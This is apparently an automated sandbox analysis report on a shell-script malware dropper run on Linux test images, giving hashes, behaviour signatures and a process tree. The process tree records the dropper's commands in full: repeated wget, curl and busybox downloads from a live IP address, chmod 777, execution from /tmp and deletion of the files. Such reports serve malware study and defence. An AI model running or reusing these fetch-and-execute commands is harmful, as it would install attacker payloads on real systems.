Analysis
-
max time kernel
70s -
max time network
74s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:11
Static task
static1
Behavioral task
behavioral1
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
-
Size
10KB
-
MD5
494b961d2cc6cd624a738d892314cce5
-
SHA1
2052b079fe79da190c6459c627a8c44003ae1f58
-
SHA256
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a
-
SHA512
801d76a32d0790a02cd3d7cd93041c371e44ee9240e240edbb3ecc9fe52c8c26b5395847509398bfa4a17c7a0064475421114120a7b5a49d167b5015a0149e50
-
SSDEEP
96:0rD7ICJJSVBxqV9VlVAVhVlVAzyqz6JbvQXgQLYE1sw/yqz8zJJSVBhk7V9VlVAQ:6eqXrifnmzheJqSXrifn0f
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh/tmp/1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:708
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:713
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:734
-
-
/bin/chmodchmod 777 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP./hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:740
-
-
/bin/chmodchmod 777 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO./YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:746
-
-
/bin/chmodchmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:755
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:775
-
-
/bin/chmodchmod 777 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r./TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:784
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:785
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:802
-
-
/bin/chmodchmod 777 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh./BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:806
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:807
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:809
-
-
/bin/chmodchmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:815
-
-
/bin/chmodchmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:836
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:837
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:852
-
-
/bin/chmodchmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:860
-
-
/bin/chmodchmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:866
-
-
/bin/chmodchmod 777 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo./78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:872
-
-
/bin/chmodchmod 777 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh./nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:878
-
-
/bin/chmodchmod 777 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5./nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:884
-
-
/bin/chmodchmod 777 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq./JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:890
-
-
/bin/chmodchmod 777 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H./T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:896
-
-
/bin/chmodchmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:902
-
-
/bin/chmodchmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:908
-
-
/bin/chmodchmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:914
-
-
/bin/chmodchmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:920
-
-
/bin/chmodchmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:926
-
-
/bin/chmodchmod 777 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r./TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:932
-
-
/bin/chmodchmod 777 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh./BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:938
-
-
/bin/chmodchmod 777 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo./78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:944
-
-
/bin/chmodchmod 777 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh./nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:950
-
-
/bin/chmodchmod 777 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5./nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:956
-
-
/bin/chmodchmod 777 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq./JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:962
-
-
/bin/chmodchmod 777 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H./T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:968
-
-
/bin/chmodchmod 777 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP./hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:974
-
-
/bin/chmodchmod 777 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO./YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:977
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97